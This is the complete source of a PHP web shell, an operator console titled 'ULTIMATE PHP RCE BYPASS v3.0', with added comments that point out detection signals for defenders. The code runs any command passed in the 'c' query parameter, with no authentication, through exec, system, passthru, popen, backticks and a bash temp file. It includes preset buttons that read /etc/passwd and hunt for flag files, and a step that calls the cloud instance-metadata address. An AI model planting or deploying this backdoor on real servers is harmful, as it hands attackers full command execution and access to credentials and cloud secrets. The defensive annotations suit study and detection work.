<!DOCTYPE html>
<html>
<head>
<!-- Head of a single-file PHP page. The title labels it as a command-execution console.
     The title text here and the heading text in the body are fixed strings, so an
     unmodified copy can be found by a content scan of the web root.
     The style block below is presentation only (terminal-style colours and layout). -->
<title>🛡️ ULTIMATE PHP RCE BYPASS v3.0 🛡️</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
/* Layout and colours only; nothing in these rules affects what the server-side code does. */
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: 'Courier New', monospace;
background: #0a0a0a;
color: #00ff41;
height: 100vh;
overflow: hidden;
}
.terminal { height: 100vh; display: flex; flex-direction: column; padding: 20px; }
.header {
background: rgba(0,255,65,0.15);
padding: 15px;
border-radius: 8px;
margin-bottom: 15px;
border: 1px solid #00ff41;
}
.header h1 { color: #ff0040; font-size: 18px; margin-bottom: 10px; }
.info { font-size: 12px; color: #00aaff; }
.input-area {
background: rgba(0,0,0,0.9);
border: 2px solid #00ff41;
border-radius: 8px;
padding: 15px;
margin-bottom: 10px;
display: flex;
gap: 10px;
}
#cmd-input {
flex: 1; background: transparent; border: none; color: #00ff41;
font-family: inherit; font-size: 14px; outline: none; padding: 5px;
}
.btn { padding: 10px 16px; border: none; border-radius: 5px; cursor: pointer; font-family: inherit; }
.exec-btn { background: #ff0040; color: white; font-weight: bold; }
.clear-btn { background: #333; color: #00ff41; }
.output {
flex: 1; background: #000; border: 1px solid #333;
border-radius: 8px; padding: 15px; overflow-y: auto;
font-size: 13px; line-height: 1.5; white-space: pre-wrap;
}
.output::-webkit-scrollbar { width: 6px; }
.output::-webkit-scrollbar-thumb { background: #00ff41; }
/* Status classes used by both the client script and the server-side echo statements. */
.success { color: #00ff41 !important; }
.error { color: #ff0040 !important; }
.method { color: #ffaa00 !important; }
.quick-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(100px, 1fr)); gap: 5px; margin-bottom: 10px; }
.quick-btn { padding: 8px; background: rgba(255,255,255,0.1); border: 1px solid #666; color: #ccc; border-radius: 4px; cursor: pointer; font-size: 11px; }
.quick-btn:hover { background: #00ff41; color: #000; }
</style>
</head>
<body>
<!-- Operator console markup: a banner, a free-text command field, a row of preset
     buttons and an output pane. The markup only collects text; the command is run by
     the server-side PHP block further down the page. -->
<div class="terminal">
<div class="header">
<h1>🛡️ ULTIMATE PHP EXEC BYPASS TERMINAL 🛡️</h1>
<!-- Banner filled in by PHP echo tags: request Host header plus script path,
     get_current_user(), phpversion() and getcwd(). None of these values is HTML-escaped,
     and the Host header is supplied by the client. get_current_user() reports the owner
     of the script file, which is not necessarily the account the PHP worker runs as, so
     during incident response it points at the account that wrote the file. -->
<div class="info">
🎯 <?php echo $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']; ?> |
👤 <?php echo get_current_user(); ?> |
⚙️ PHP <?php echo phpversion(); ?> |
📁 <?php echo getcwd(); ?>
</div>
</div>
<!-- Free-text command entry. Both buttons rely on inline onclick handlers that call
     functions defined in the script block below. -->
<div class="input-area">
<input type="text" id="cmd-input" placeholder="whoami, id, ls -la, find / -name '*flag*'" autofocus>
<button class="btn exec-btn" onclick="runCmd()">EXEC 🚀</button>
<button class="btn clear-btn" onclick="clearOut()">CLEAR</button>
</div>
<!-- Preset buttons: each passes a fixed command string to quick(), which submits it like
     typed input. The presets cover account identity, a directory listing, /etc/passwd, a
     filesystem search for names containing "flag", and the process list. The same strings
     appear URL-encoded in the c query parameter of access-log entries for this page.
     NOTE(review): on the "flags" button the inner double quotes end the onclick attribute
     early as printed; presumably they were entity-encoded before page extraction. Confirm
     against the original file. -->
<div class="quick-grid">
<button class="quick-btn" onclick="quick('whoami')">whoami</button>
<button class="quick-btn" onclick="quick('id')">id</button>
<button class="quick-btn" onclick="quick('ls -la')">ls</button>
<button class="quick-btn" onclick="quick('cat /etc/passwd')">users</button>
<button class="quick-btn" onclick="quick('find / -name "*flag*" 2>/dev/null | head -5')">flags</button>
<button class="quick-btn" onclick="quick('ps aux')">ps</button>
</div>
<div id="output" class="output">
💚 Terminal ready | Working methods will auto-detect...
</div>
</div>
<script>
// Client-side glue for the console. Nothing in this script executes a command:
// runCmd() only navigates the browser back to this same page with the typed text
// in the `c` query parameter, where the server-side PHP block picks it up.
const input = document.getElementById('cmd-input');
const output = document.getElementById('output');
input.focus();
// Pressing Enter in the command field submits it, same as the EXEC button.
input.onkeypress = e => e.key=='Enter' && runCmd();
// Appends one line to the output pane, with an optional CSS class, and scrolls to the end.
// The text goes through escapeHtml() before being written via innerHTML.
function addLine(text, cls='') {
output.innerHTML += `<div class="${cls}">${escapeHtml(text)}\n</div>`;
output.scrollTop = output.scrollHeight;
}
// Intended to replace & < > " ' with HTML entities.
// NOTE(review): as printed, the map replaces each character with itself and the final
// entry (''') is not a valid string literal, which would stop this whole script from
// parsing. This looks like HTML entities decoded during page extraction; confirm
// against the original file.
function escapeHtml(t) { return t.replace(/[&<>"']/g, m=>({ '&':'&', '<':'<', '>':'>', '"':'"', "'":''' })[m]); }
// Resets the output pane to a fixed status line.
function clearOut() { output.innerHTML = '💚 Cleared\n'; }
// Used by the preset buttons: puts the preset text in the field and submits it.
function quick(cmd) { input.value = cmd; runCmd(); }
// Submits the current field value. Empty input is ignored.
// The command is sent as a GET query string (?c=...), so it ends up URL-encoded in
// web server access logs, proxy logs and browser history. The line added to the
// output pane just before navigating is lost when the page reloads.
function runCmd() {
const cmd = input.value.trim();
if(!cmd) return;
addLine('➤ ' + cmd, 'method');
input.value = '';
window.location.href = '?c=' + encodeURIComponent(cmd);
}
</script>
<?php
// Server-side handler. When the request carries a `c` query parameter, its raw value
// is treated as a shell command and handed to several PHP process-execution
// primitives in turn. This block contains no authentication check, allow-list or
// argument escaping, so anyone who can reach the URL controls the command line.
// Defender view: the command arrives in the GET query string (recorded in access
// logs), and every method below spawns a child process of the PHP worker, which
// process telemetry can key on.
if(isset($_GET['c'])) {
$cmd = $_GET['c'];
// The request value is interpolated into the response without htmlspecialchars().
echo "<div class='success'>Executing: $cmd</div>";
// METHOD 1: Direct function calls (if not disabled)
// Ordered table of execution primitives: four built-in function names and a closure
// wrapping popen(). Every name here is a candidate for disable_functions in php.ini
// on hosts that never need to spawn processes from PHP.
$methods = [
'exec' => 'exec',
'shell_exec' => 'shell_exec',
'system' => 'system',
'passthru' => 'passthru',
'popen' => function($c) {
// Reads the child's stdout in 1024-byte chunks until EOF and returns it as a string.
$p = popen($c, 'r');
$out = '';
while(!feof($p)) $out .= fread($p, 1024);
pclose($p);
return $out;
}
];
// Try each entry, capture whatever it prints, and stop at the first non-empty result.
// exec() and shell_exec() return their output instead of printing it, so the buffer
// captured here stays empty for them and the loop moves on; the same command is then
// run again by the next entry. One request can therefore spawn the command several
// times, visible as repeated identical child processes of the PHP worker.
foreach($methods as $name => $func) {
if(is_callable($func)) {
ob_start();
if($name == 'popen') {
echo $func($cmd);
} else {
$func($cmd);
}
$result = ob_get_clean();
if(trim($result) != '') {
// Command output is written into the page without HTML escaping.
echo "<div>✅ $name WORKS:</div>";
echo "<div class='success'>$result</div>";
// exit ends the response here, before the closing body and html tags.
exit;
}
}
}
// METHOD 2: Backticks (most reliable)
// The backtick operator is the same facility as shell_exec(), so listing shell_exec
// in disable_functions also disables it. stderr is merged into stdout by the 2>&1
// suffix. $output receives the (empty) buffer and is not used afterwards.
ob_start();
$result = `$cmd 2>&1`;
$output = ob_get_clean();
if(trim($result) != '') {
echo "<div>✅ Backticks:</div>";
echo "<div class='success'>$result</div>";
exit;
}
// METHOD 3: File-based execution
// Writes the command text to a file created by tempnam() in the system temp directory
// with the name prefix 'cmd', runs it with bash through shell_exec(), then deletes it.
// Artifacts: a short-lived temp file with that prefix owned by the PHP worker, and a
// `bash <temp path>` child process. It still depends on shell_exec() being available.
$tmpfile = tempnam(sys_get_temp_dir(), 'cmd');
file_put_contents($tmpfile, $cmd);
$result = shell_exec("bash $tmpfile 2>&1");
unlink($tmpfile);
if($result) {
echo "<div>✅ File exec:</div>";
echo "<div class='success'>$result</div>";
exit;
}
// METHOD 4: curl to command (if external access)
// Despite the label above, this does not run the command. It has curl send the command
// text as a request body (-d) to 169.254.169.254/latest/meta-data/, the link-local
// instance metadata address used on cloud hosts, and prints whatever comes back.
// $cmd is placed inside a single-quoted shell argument with no escaping.
// Defender view: a request from the web worker to that address is a high-signal event;
// restrict the web service account's access to the metadata endpoint and alert on it.
$curl_cmd = "curl -s 'http://169.254.169.254/latest/meta-data/' -d '$cmd'";
$result = shell_exec($curl_cmd);
if($result) echo "<div class='success'>$result</div>";
// Reached whenever none of the earlier methods called exit, including when the curl
// step above printed a response.
echo "<div class='error'>❌ ALL DIRECT METHODS BLOCKED</div>";
echo "<div class='info'>Try LFI / RFI / file upload bypass</div>";
}
?>
</body>
</html>